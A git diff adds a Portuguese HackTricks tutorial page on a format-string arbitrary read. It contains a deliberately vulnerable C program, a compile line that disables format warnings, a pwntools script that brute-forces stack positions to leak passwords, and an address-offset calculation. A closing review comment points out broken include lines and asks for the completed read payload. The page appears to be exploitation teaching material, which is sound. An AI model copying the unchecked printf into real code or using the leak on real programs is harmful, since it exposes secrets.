diff --git a/.gitbook/assets/image (1225).png b/.gitbook/assets/image (1225).png new file mode 100644 index 000000000..b0a1f83a4 Binary files /dev/null and b/.gitbook/assets/image (1225).png differ diff --git a/.gitbook/assets/image (1226).png b/.gitbook/assets/image (1226).png new file mode 100644 index 000000000..66c23406f Binary files /dev/null and b/.gitbook/assets/image (1226).png differ diff --git a/.gitbook/assets/image (1227).png b/.gitbook/assets/image (1227).png new file mode 100644 index 000000000..47298f9e6 Binary files /dev/null and b/.gitbook/assets/image (1227).png differ diff --git a/.gitbook/assets/image (1228).png b/.gitbook/assets/image (1228).png new file mode 100644 index 000000000..2cb50f892 Binary files /dev/null and b/.gitbook/assets/image (1228).png differ diff --git a/.gitbook/assets/image (1229).png b/.gitbook/assets/image (1229).png new file mode 100644 index 000000000..ffbd0b31e Binary files /dev/null and b/.gitbook/assets/image (1229).png differ diff --git a/.gitbook/assets/image (1230).png b/.gitbook/assets/image (1230).png new file mode 100644 index 000000000..49c6c459e Binary files /dev/null and b/.gitbook/assets/image (1230).png differ diff --git a/.gitbook/assets/image (1231).png b/.gitbook/assets/image (1231).png new file mode 100644 index 000000000..545fcdfaf Binary files /dev/null and b/.gitbook/assets/image (1231).png differ diff --git a/.gitbook/assets/image (1232).png b/.gitbook/assets/image (1232).png new file mode 100644 index 000000000..a3ec7d605 Binary files /dev/null and b/.gitbook/assets/image (1232).png differ diff --git a/.gitbook/assets/image (1233).png b/.gitbook/assets/image (1233).png new file mode 100644 index 000000000..4d9c81fde Binary files /dev/null and b/.gitbook/assets/image (1233).png differ diff --git a/.gitbook/assets/image (1234).png b/.gitbook/assets/image (1234).png new file mode 100644 index 000000000..21b3b1ba6 Binary files /dev/null and b/.gitbook/assets/image (1234).png differ 
diff --git a/SUMMARY.md b/SUMMARY.md index 7edb398d4..1cc896174 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -715,6 +715,7 @@ * [Array Indexing](binary-exploitation/array-indexing.md) * [Integer Overflow](binary-exploitation/integer-overflow.md) * [Format Strings](binary-exploitation/format-strings/README.md) + * [Format Strings - Arbitrary Read Example](binary-exploitation/format-strings/format-strings-arbitrary-read-example.md) * [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md) * [Heap](binary-exploitation/heap/README.md) * [Use After Free](binary-exploitation/heap/use-after-free.md) diff --git a/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md new file mode 100644 index 000000000..df3fb5d9d --- /dev/null +++ b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md @@ -0,0 +1,98 @@ +# Exemplo de Leitura Arbitrária - Strings de Formato + +
+ +Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! + +Outras maneiras de apoiar o HackTricks: + +* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! +* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com) +* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github. + +
+ +## Código +```c +#include +#include + +char bss_password[20] = "hardcodedPassBSS"; // Password in BSS + +int main() { +char stack_password[20] = "secretStackPass"; // Password in stack +char input1[20], input2[20]; + +printf("Enter first password: "); +scanf("%19s", input1); + +printf("Enter second password: "); +scanf("%19s", input2); + +// Vulnerable printf +printf(input1); +printf("\n"); + +// Check both passwords +if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) { +printf("Access Granted.\n"); +} else { +printf("Access Denied.\n"); +} + +return 0; +} +``` +Compile com: +```bash +clang -o fs-read fs-read.c -Wno-format-security +``` +### Ler da pilha + +A **`stack_password`** será armazenada na pilha porque é uma variável local, então apenas abusar do printf para mostrar o conteúdo da pilha é suficiente. Este é um exploit para BF as primeiras 100 posições para vazar as senhas da pilha: +```python +from pwn import * + +for i in range(100): +print(f"Try: {i}") +payload = f"%{i}$s\na".encode() +p = process("./fs-read") +p.sendline(payload) +output = p.clean() +print(output) +p.close() +``` +Na imagem é possível ver que podemos vazar a senha da pilha na posição `10ª`: + +
+ +
+ +Executando o mesmo exploit, mas com `%p` em vez de `%s`, é possível vazar um endereço de heap da pilha em `%5$p`: + +
+ +
+ +
+ +A diferença entre o endereço vazado e o endereço da senha é: +``` +> print 0xaaaaaaac12b2 - 0xaaaaaaac0048 +$1 = 0x126a +``` +
+ +Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! + +Outras maneiras de apoiar o HackTricks: + +* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! +* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com) +* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github. + +
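Review bot: in the new file `format-strings-arbitrary-read-example.md` the two include lines of the C listing carry no header names (`#include` / `#include`), so the program as committed does not build with the `clang -o fs-read fs-read.c -Wno-format-security` line that follows; they should read `#include <stdio.h>` (printf, scanf) and `#include <string.h>` (strcmp). Two further points in the same hunk: the page is titled as an arbitrary read example, yet the text stops right after computing the `0x126a` delta between the `%5$p` leak and the password address and never shows the step that uses it, namely placing the computed target address in the input buffer and dereferencing it with a positional `%N$s` (and which stack position `input1` sits at, which the `%s` brute force has just established); please add that payload, and state which password `0xaaaaaaac0048` belongs to. The text also describes the `%5$p` value as a heap address; if the target is `bss_password`, a global in the binary image, the pointer you subtract from should be one into the binary itself, otherwise the offset is not constant across runs under PIE, so check the wording. Finally, in the pwntools loop `output = p.clean()` uses the default 0.05 s timeout and can return before the child has printed anything, producing empty output for positions that do leak; `p.clean(timeout=1)` or `p.recvall(timeout=1)` is more reliable, and a short comment that the `\na` suffix in `f"%{i}$s\na"` relies on `scanf("%19s")` stopping at whitespace so that `a` satisfies the second prompt would help the reader (also spell out "BF" as brute force).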